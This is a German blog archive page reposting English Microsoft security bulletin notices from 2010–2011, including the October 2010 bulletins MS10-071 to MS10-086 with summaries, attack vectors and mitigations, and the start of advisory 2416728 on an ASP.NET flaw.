Archiv der Kategorie: Security Bulletin

ADVANCE NOTIFICATION – February 2011 Microsoft Security Bulletin Release

Microsoft hat in seiner Security Bulletin Advance Notification für Februar 2011 insgesamt 12 neue Security Bulletins angekündigt (siehe unten aufgeführt nach Schweregrad und Sicherheitsauswirkung). Die Veröffentlichung der neuen Sicherheitsupdates ist für den 08.02.11 geplant.

Deutsche Infos findet Ihr demnächst unter: http://www.microsoft.com/germany/technet/sicherheit/bulletins/aktuell/default.mspx.

Weitere allgemeine Informationen zu den Microsoft Security Bulletin Advance Notifications findet Ihr hier: http://www.microsoft.com/germany/technet/sicherheit/bulletins/bulletinadvance.mspx

What is the purpose of this alert?

As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers concerning the number of new security updates being released, the products affected, the aggregate maximum severity, and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively.

On February 08, 2011, Microsoft is planning to release 12 new security bulletins. Below is a summary.

New Bulletin Summary

Bulletin ID

Maximum Severity Rating

Vulnerability Impact

Restart Requirement

Affected Software*

Bulletin 1

Critical

Remote Code Execution

Requires restart

Internet Explorer on Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Bulletin 2

Critical

Remote Code Execution

Requires restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.

Bulletin 3

Critical

Remote Code Execution

Requires restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Bulletin 4

Important

Remote Code Execution

May require restart

Microsoft Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Bulletin 5

Important

Denial of Service

Requires restart

Microsoft Windows Server 2003

Bulletin 6

Important

Remote Code Execution

May require restart

Microsoft Visio 2002, Visio 2003, and Visio 2007.

Bulletin 7

Important

Information Disclosure

May require restart

Microsoft Windows 7 and Windows Server 2008 R2.

Bulletin 8

Important

Elevation of Privilege

Restart required

Microsoft Windows XP and Windows Server 2003.

Bulletin 9

Important

Elevation of Privilege

Restart required

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Bulletin 10

Important

Elevation of Privilege

Restart required

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Bulletin 11

Important

Elevation of Privilege

Restart required

Microsoft Windows XP, Windows Server 2003, Windows 7, and Windows Server 2008 R2.

Bulletin 12

Important

Elevation of Privilege

Restart required

Microsoft Windows XP and Windows Server 2003.

* The list of affected software in the summary table is an abstract. To see the full list of affected components please click on the "Advance Notification Webpage" link below and review the "Affected Software" section.

Although we do not anticipate any changes, the number of bulletins, products affected, restart information, and severities are subject to change until released.

Advance Notification Webpage: The full version of the Microsoft Security Bulletin Advance Notification for this month can be found at http://www.microsoft.com/technet/security/bulletin/ms11-feb.mspx.

Microsoft Windows Malicious Software Removal Tool: Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Monthly Security Bulletin Webcast: To address customer questions on these bulletins Microsoft will host a webcast next Wednesday, February 09, 2011, at 11:00 A.M. Pacific Time (U.S. and Canada). Registration for this event and other details can be found at http://www.microsoft.com/technet/security/bulletin/summary.mspx.

At this time, no additional information on these bulletins, such as details regarding the vulnerability or severity, will be made available until the bulletins are published on Tuesday.

Regarding Information Consistency

We strive to provide you with accurate information in static (this mail) and dynamic (web-based) content. Microsoft’s security content posted to the web is occasionally updated to reflect late-breaking information. If this results in an inconsistency between the information here and the information in Microsoft’s web-based security content, the information in Microsoft’s web-based security content is authoritative.

If you have any questions regarding this alert please contact your Technical Account Manager or Application Development Consultant.

Thank you,

Microsoft CSS Security Team

October 2010 Microsoft Security Bulletin Release

Die Microsoft Security Bulletins für Oktober 2010 wurden veröffentlicht. Die Veröffentlichung der Bulletins ersetzt die Bulletin Advance Notification, die erstmalig am 07.10.10 bekanntgegeben wurde.

Weitere Infos stehen unten und auch online auf: http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms10-oct.mspx (dt.)

In der unten folgenden Tabelle sind die Security Bulletins für diesen Monat nach Schweregrad geordnet.

Am Mittwoch, den 13.10.10 führt Microsoft um 20:00 Uhr (MEZ) einen englischsprachigen Webcast durch, um Fragen zu diesen Bulletins zu beantworten. Registriert Euch jetzt für den Security Bulletin-Webcast im Oktober. Im Anschluss steht dieser Webcast auf Anfrage zur Verfügung.

Weitere Informationen dazu gibt es unter Microsoft Security Bulletin Zusammenfassungen und Webcasts.

What is the purpose of this alert?

This alert is to provide you with an overview of the new security bulletin(s) being released on October 12, 2010. Security bulletins are released monthly to resolve critical problem vulnerabilities.

New Security Bulletins

Microsoft is releasing the following sixteen (16) new security bulletins for newly discovered vulnerabilities:

Bulletin ID

Bulletin Title

Max Severity Rating

Vulnerability Impact

Restart Requirement

Affected Software

MS10-071

Cumulative Security Update for Internet Explorer (2360131)

Critical

Remote Code Execution

Requires restart

Internet Explorer on Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-072

Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)

Important

Information Disclosure

May require restart

Microsoft Windows SharePoint Services 3.0, SharePoint Foundation 2010, Office SharePoint Server 2007, Groove Server 2010, and Office Web Apps.

MS10-073

Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957)

Important

Elevation of Privilege

Requires restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-074

Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution (2387149)

Moderate

Remote Code Execution

May require restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-075

Vulnerability in Media Player Network Sharing Service Could Allow Remote Code Execution (2281679)

Critical

Remote Code Execution

May require restart

Microsoft Windows Vista and Windows 7.

MS10-076

Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (982132)

Critical

Remote Code Execution

May require restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-077

Vulnerability in .NET Framework Could Allow Remote Code Execution (2160841)

Critical

Remote Code Execution

May require restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-078

Vulnerabilities in the OpenType Font (OTF) Format Driver Could Allow Elevation of Privilege (2279986)

Important

Elevation of Privilege

Requires restart

Microsoft Windows XP and Windows Server 2003.

MS10-079

Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2293194)

Important

Remote Code Execution

May require restart

Microsoft Office Word 2002, Word 2003, Word 2007, Word 2010, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac, Word Viewer, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, Office Web Apps, and Word Web App.

MS10-080

Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2293211)

Important

Remote Code Execution

May require restart

Microsoft Excel 2002, Excel 2003, Excel 2007, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac, Excel Viewer, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats.

MS10-081

Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011)

Important

Remote Code Execution

Requires restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-082

Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)

Important

Remote Code Execution

May require restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-083

Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution (2405882)

Important

Remote Code Execution

Requires restart

Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-084

Vulnerability in Windows Local Procedure Call Could Cause Elevation of Privilege (2360937)

Important

Elevation of Privilege

Requires restart

Microsoft Windows XP and Windows Server 2003.

MS10-085

Vulnerability in SChannel Could Allow Denial of Service (2207566)

Important

Denial of Service

Requires restart

Microsoft Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

MS10-086

Vulnerability in Windows Shared Cluster Disks Could Allow Tampering (2294255)

Moderate

Tampering

Requires restart

Microsoft Windows Server 2008 R2.

* The list of affected software above is an abstract. To see the full list of affected components please visit the bulletin at the link provided in the left column and review the "Affected Software" section.

Summaries for new bulletin(s) may be found at http://www.microsoft.com/technet/security/bulletin/MS10-oct.mspx.

Microsoft Windows Malicious Software Removal Tool

Microsoft is releasing an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Server Update Services (WSUS), Windows Update (WU), and the Download Center. Information on the Microsoft Windows Malicious Software Removal Tool is available at http://support.microsoft.com/?kbid=890830.

High Priority Non-Security Updates

High priority non-security updates Microsoft releases to be available on Microsoft Update (MU), Windows Update (WU), or Windows Server Update Services (WSUS) will be detailed in the KB article found at http://support.microsoft.com/?id=894199.

Public Bulletin Webcast

Microsoft will host a webcast to address customer questions on these bulletins:

Title: Information about Microsoft October Security Bulletins (Level 200)

Date: Wednesday, October 13, 2010, 11:00 A.M. Pacific Time (U.S. and Canada)

URL: http://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032454437

New Security Bulletin Technical Details

In the following tables of affected and non-affected software, software editions that are not listed are past their support lifecycle. To determine the support lifecycle for your product and edition, visit the Microsoft Support Lifecycle web site at http://support.microsoft.com/lifecycle/.

Bulletin Identifier

Microsoft Security Bulletin MS10-071

Bulletin Title

Cumulative Security Update for Internet Explorer (2360131)

Executive Summary

This security update resolves seven privately reported vulnerabilities and three publicly disclosed vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

The security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, CSS special characters, HTML sanitization, the AutoComplete feature, the Anchor element, and script during certain processes.

Severity Ratings and Affected Software

· This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients;

· This security update is rated Important for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers.

Attack Vectors

· A maliciously crafted Web Page

· A maliciously crafted email message

Mitigating Factors

· An attacker would have no way to force users to visit a malicious Web site.

· By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode, known as Enhanced Security Configuration.

· By default, all supported versions of Outlook, Outlook Express, and Windows Mail open HTML email messages in the Restricted sites zone.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user – users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-053

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-072

Bulletin Title

Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)

Executive Summary

This security update resolves one publicly disclosed vulnerability and one privately reported vulnerability in Microsoft SharePoint and Windows SharePoint Services. The vulnerabilities could allow information disclosure if an attacker submits specially crafted script to a target site using SafeHTML.

The update addresses the vulnerabilities by modifying the way that SafeHTML sanitizes HTML content.

Severity Ratings and Affected Software

This security update is rated Important for Microsoft SharePoint Services 3.0, Microsoft SharePoint Foundation 2010, Microsoft Office Web Apps, all supported editions of Microsoft Office SharePoint Server 2007, and Microsoft Groove Server 2010.

Attack Vectors

An attacker submits a specially crafted script to a target site using SafeHTML.

Mitigating Factors

Microsoft has not identified any mitigations for CVE-2010-3324. Regarding the second vulnerability, only sites that use SafeHTML to sanitize HTML are potentially affected  for CVE-2010-3243.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

MS10-039

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-072.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-073

Bulletin Title

Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957)

Executive Summary

This security update resolves several publicly disclosed vulnerabilities in the Windows kernel-mode drivers. The most severe of these vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application.

The security update addresses the vulnerabilities by correcting the manner in which the Windows kernel-mode drivers maintain the reference count for an object, index a table of function pointers when loading a keyboard layout from disk, and validate window class data.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Microsoft Windows.

Attack Vectors

· A malicious user logon.

· A maliciously crafted application.

· A maliciously crafted script.

Mitigating Factors

An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-048

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-073.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-074

Bulletin Title

Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution (2387149)

Executive Summary

This security update resolves a publicly disclosed vulnerability in the Microsoft Foundation Class (MFC) Library. The vulnerability could allow remote code execution if a user is logged on with administrative user rights and opens an application built with the MFC Library. An attacker who successfully exploited this vulnerability could obtain the same permissions as the currently logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system.

The security update addresses the vulnerability by adding additional checks to requests for window title changes.

Severity Ratings and Affected Software

This security update is rated Moderate for all supported releases of Microsoft Windows.

Attack Vectors

· A window title change based on network input such as in a chat application or a web browser.

· A window title change based on the content of a file opened with the MFC application.

· A specially crafted file with a specific MFC application installed on the user’s system.

Mitigating Factors

An attacker who successfully exploited this vulnerability could obtain the same permissions as the currently logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

For Windows Server 2003 SP2: MS07-012

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-074.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-075

Bulletin Title

Vulnerability in Media Player Network Sharing Service Could Allow Remote Code Execution (2281679)

Executive Summary

This security update resolves a privately reported vulnerability in the Microsoft Windows Media Player Network Sharing Service. The vulnerability could allow remote code execution if an attacker sent a specially crafted RTSP packet to an affected system.

The security update addresses the vulnerability by correcting the way that Windows Media Player Network Sharing Service handles specially crafted RTSP packets.

Severity Ratings and Affected Software

This security update is rated Critical for supported editions of Windows 7 and Important for all supported editions of Windows Vista.

Attack Vectors

Maliciously crafted network packets.

Mitigating Factors

· Internet access to home media is disabled by default. In this default configuration, the vulnerability can be exploited only by an attacker within the same subnet.

· On supported editions of Windows Vista and on Windows 7 Professional, Windows 7 Enterprise, and Windows 7 Ultimate editions, the Windows Media Player Network Sharing Service is not enabled by default.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-075.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-076

Bulletin Title

Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (982132)

Executive Summary

This security update resolves a privately reported vulnerability in a Microsoft Windows component, the Embedded OpenType (EOT) Font Engine. The vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely.

The security update addresses the vulnerability by correcting the way that the Embedded OpenType Font Engine parses files and content containing embedded fonts.

Severity Ratings and Affected Software

This security update is rated Critical for all supported releases of Microsoft Windows.

Attack Vectors

· A maliciously crafted Office document.

· A maliciously crafted Web page.

· A maliciously crafted email.

Mitigating Factors

· In the Web-based attack scenario, users would have to be persuaded to visit a malicious Web site.

· Exploitation only gains the same user rights as the logged on account – users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-076.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-077

Bulletin Title

Vulnerability in .NET Framework Could Allow Remote Code Execution (2160841)

Executive Summary

This security update resolves a privately reported vulnerability in Microsoft .NET Framework. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs). The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario.

The security update addresses the vulnerability by modifying the way that the JIT compiler optimizes code.

Severity Ratings and Affected Software

This security update is rated Critical for Microsoft .NET Framework 4.0 on supported x64-based and Itanium-based editions of Microsoft Windows.

Attack Vectors

· A maliciously crafted Web page.

· An uploaded malicious ASP.NET application that would be used to break out of the sandbox in a Web hosting environment.

Mitigating Factors

· By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user or the user account of ASP.NET. Users or accounts that are configured to have fewer user rights on the system could be less impacted than users or accounts that operate with administrative user rights.

· an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail or Instant Messenger message that takes users to the attacker’s Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-077.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-078

Bulletin Title

Vulnerabilities in the OpenType Font (OTF) Format Driver Could Allow Elevation of Privilege (2279986)

Executive Summary

This security update resolves two privately reported vulnerabilities in the Windows OpenType Font (OTF) format driver. The vulnerabilities could allow elevation of privilege if a user views content rendered in a specially crafted OpenType font.

The security update addresses the vulnerabilities by correcting the way the OpenType Font (OTF) format driver allocates memory and performs integer calculations when processing OpenType fonts.

Severity Ratings and Affected Software

· This security update is rated Important for all supported editions of Windows XP and Windows Server 2003.

· Note: All supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are not affected by the vulnerability.

Attack Vectors

· A malicious user logon

· A maliciously crafted application

· A maliciously crafted script

Mitigating Factors

· An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-037

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-078.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-079

Bulletin Title

Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2293194)

Executive Summary

This security update resolves eleven privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Word file.

The update addresses the vulnerabilities by modifying the way that Microsoft Office Word parses specially crafted Word files.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Microsoft Word 2002, Microsoft Word 2003, Microsoft Word 2007, Microsoft Word 2010, Microsoft Office 2004 for Mac, and Microsoft Office 2008 for Mac; Open XML File Format Converter for Mac; and all supported versions of Microsoft Office Word Viewer and Microsoft Office Compatibility Pack.

Attack Vectors

A maliciously crafted Word document. Common delivery mechanisms: a maliciously crafted Web page, an email attachment, an instant message, a peer-to-peer file share, a network share, and/or a USB thumb drive.

Mitigating Factors

· The vulnerability cannot be exploited automatically through email. For an attack to be successful, a user must open an attachment that is sent in an email message.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

· MS10-056

· For the Microsoft Word Viewer: MS09-068

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-079.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-080

Bulletin Title

Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2293211)

Executive Summary

This security update resolves thirteen privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file or a specially crafted Lotus 1-2-3 file.

The update addresses the vulnerabilities by changing the way that Microsoft Office Excel parses specially crafted Excel files and specially crafted Lotus 1-2-3 files.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Microsoft Excel 2002, Microsoft Excel 2003, Microsoft Excel 2007, Microsoft Office 2004 for Mac, and Microsoft Office 2008 for Mac; Open XML File Format Converter for Mac; and all supported versions of Microsoft Office Excel Viewer and Microsoft Office Compatibility Pack.

Attack Vectors

A maliciously crafted Excel spreadsheet. Common delivery mechanisms: a maliciously crafted Web page, an email attachment, an instant message, a peer-to-peer file share, a network share, and/or a USB thumb drive.

Mitigating Factors

· The vulnerability cannot be exploited automatically through email. For an attack to be successful, a user must open an attachment that is sent in an email message.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

MS10-038 and MS10-057

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-080.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-081

Bulletin Title

Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011)

Executive Summary

This security update resolves a privately reported vulnerability in the Windows common control library. The vulnerability could allow remote code execution if a user visited a specially crafted Web page. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system.

The security update addresses the vulnerability by correcting the manner in which the Windows common controls handle messages passed from a third-party scalable vector graphics (SVG) viewer.

Severity Ratings and Affected Software

This security update is rated Important for all supported releases of Microsoft Windows.

Attack Vectors

A maliciously crafted Web page.

Mitigating Factors

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-081.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-082

Bulletin Title

Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)

Executive Summary

This security update resolves a privately reported vulnerability in Windows Media Player. The vulnerability could allow remote code execution if Windows Media Player opened specially crafted media content hosted on a malicious Web site.

The security update addresses the vulnerability by correcting the manner in which Windows Media Player deallocates objects during a reload operation.

Severity Ratings and Affected Software

· This security update is rated Important for Windows Media Player 9 Series, Windows Media Player 10, Windows Media Player 11, and Windows Media Player 12 when installed on supported releases of Microsoft Windows except for Windows Server 2008 and Windows Server 2008 R2.

· This security update is rated Moderate for Windows Media Player 11 and Windows Media Player 12 when installed on supported editions of Windows Server 2008 and Windows Server 2008 R2.

· Note: All supported Itanium-based editions of Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 are not affected by the vulnerability.

Attack Vectors

A maliciously crafted Web page.

Mitigating Factors

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

For Windows Media Player 9 Series on Windows XP: MS10-027

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-082.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-083

Bulletin Title

Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution (2405882)

Executive Summary

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted file using WordPad or selects or opens a shortcut file that is on a network or WebDAV share.

The security update addresses the vulnerability by correcting the way that the Windows Shell and WordPad validate COM objects.

Severity Ratings and Affected Software

This security update is rated Important for all supported releases of Microsoft Windows.

Attack Vectors

· A maliciously crafted WordPad file.

· A malicious shortcut file.

Mitigating Factors

· The vulnerability cannot be exploited automatically through email. For an attack to be successful, a user must open an attachment that is sent in an email message.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-083.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-084

Bulletin Title

Vulnerability in Windows Local Procedure Call Could Cause Elevation of Privilege (2360937)

Executive Summary

This security update resolves a publicly disclosed vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs specially crafted code that sends an LPC message to the local LRPC Server. The message could then allow an authenticated user to access resources that are running in the context of the Network Service account.

The security update addresses the vulnerability by modifying the way LRPC port messages are handled within the RPC subsystem.

Severity Ratings and Affected Software

· This security update is rated Important for all supported editions of Windows XP and Windows Server 2003.

· Note: All supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are not affected by the vulnerability.

Attack Vectors

· A malicious user logon

· A maliciously crafted application

· A maliciously crafted script

Mitigating Factors

· An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-066

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-084.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-085

Bulletin Title

Vulnerability in SChannel Could Allow Denial of Service (2207566)

Executive Summary

This security update resolves a privately reported vulnerability in the Secure Channel (SChannel) security package in Windows. The vulnerability could allow denial of service if an affected Internet Information Services (IIS) server hosting a Secure Sockets Layer (SSL)-enabled Web site received a specially crafted packet message.

The security update addresses the vulnerability by changing the way that IIS processes client certificate requests.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Attack Vectors

A remote, anonymous attacker could send a specially crafted network packet to the affected system that would cause the LSASS service to stop responding and the system to restart.

Mitigating Factors

· Systems are only affected if SSL is enabled, which is not a default configuration.

· By default, IIS is not configured to host SSL Web sites.

· The system will automatically restart after a successful attack, allowing the system to recover.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-049

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-085.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-086

Bulletin Title

Vulnerability in Windows Shared Cluster Disks Could Allow Tampering (2294255)

Executive Summary

This security update resolves a privately reported vulnerability in Windows Server 2008 R2 when used as a shared failover cluster. The vulnerability could allow data tampering on the administrative shares of failover cluster disks. This vulnerability only applies to the cluster disks used in a failover cluster. The security update addresses this vulnerability by changing the way the Microsoft Cluster Service (MSCS) user interface sets permissions on administrative shares when adding or creating new shared cluster disks. Note: This update will not fix permissions on existing cluster disk shares.

Severity Ratings and Affected Software

This security update is rated Moderate for all supported editions of Windows Server 2008 R2.

Attack Vectors

When an administrator adds a disk to a shared cluster, the Failover Cluster Manager sets permissions on the shared cluster disk in a way that potentially provides unauthorized users (everyone) with read/write/delete access to the administrative shares on the failover cluster disk.

Mitigating Factors

By default, Windows Server 2008 R2 servers are not affected by this vulnerability.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-086.mspx

Microsoft hat das Security Advisory 2416728 veröffentlicht

Microsoft untersucht derzeit eine gemeldete Sicherheitsanfälligkeit in ASP.NET.

Weitere Infos gibt es unten unten auf englisch, auf der amerikanischen TechNet Seite (http://www.microsoft.com/technet/security/advisory/2416728.mspx) oder bald auf  der deutschen TechNet Seite http://technet.microsoft.com/de-de/security/default.aspx.

 

What is the purpose of this alert?

This alert is to notify you that Microsoft has released Security Advisory 2416728 – Vulnerability in ASP.NET Could Allow Information Disclosure — on September 17, 2010.

Summary

Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.

We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Mitigating Factors

· Microsoft has not identified any mitigations for this vulnerability.

Affected Software

Operating System

Component

Windows XP

Windows XP Media Center Edition 2005 and Windows XP Tablet PC Edition 2005

Microsoft .NET Framework 1.0 Service Pack 3

Windows XP Service Pack 3

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows XP Professional x64 Edition Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2003

Windows Server 2003 Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2003 x64 Edition Service Pack 2

Microsoft .NET Framework 1.1 Service Pack 1
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 Service Pack 1
Microsoft .NET Framework 4.0

Windows Server 2003 with SP2 for Itanium-based Systems

